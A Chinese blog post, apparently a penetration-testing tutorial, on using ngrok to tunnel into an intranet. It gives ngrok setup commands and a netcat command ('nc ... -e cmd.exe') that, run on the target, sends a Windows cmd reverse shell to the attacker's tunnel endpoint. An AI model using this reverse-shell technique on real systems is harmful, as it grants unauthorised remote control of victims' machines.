ngrok内网穿透

0X00 前言

在渗透测试过程中,可能目标主机是内网里面的机器,由于外网无法直接访问内网,我们就需要反向代理,来为下一步的工作做准备。

0X01 ngrok简介

ngrok是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。

0X02 使用方法

先去官网注册一个账号,之后下载ngrok客户端,看你的主机是什么,我的是ubantu的。
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken your authtoken
./ngrok help 查看使用帮助
./ngrok tcp 9998 获得一个地址,后面用nc发送目标的shell或者cmd就是用这个地址

ngrok

在目标机器执行
nc -vv yourserver port -e c:\Windows\System32\cmd.exe

ngrok
成功收到cmd
shell


   转载规则


《ngrok内网穿透》 Wing 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
mysql 中with rollup的用法 mysql 中with rollup的用法
如果世界不喜欢你,那世界就是我的敌人了。 今天看到一个审计的题目,解析里面说需要用到mysql的group by xxx with rollup这个语句。没用过,不知道干什么的,度娘之后那些博客解释得很难受,那种感觉就是你觉得他写的
2017-10-12
下一篇 
MySQL demolition script MySQL demolition script
别再说珍重,我只剩忧愁。 一个mysql爆破的脚本,某司里面一个表哥发的,虽然爆破的软件很多,但是个人觉得主要是学习代码。code: import pymysql import argparse import threading,Qu
2017-10-01
  目录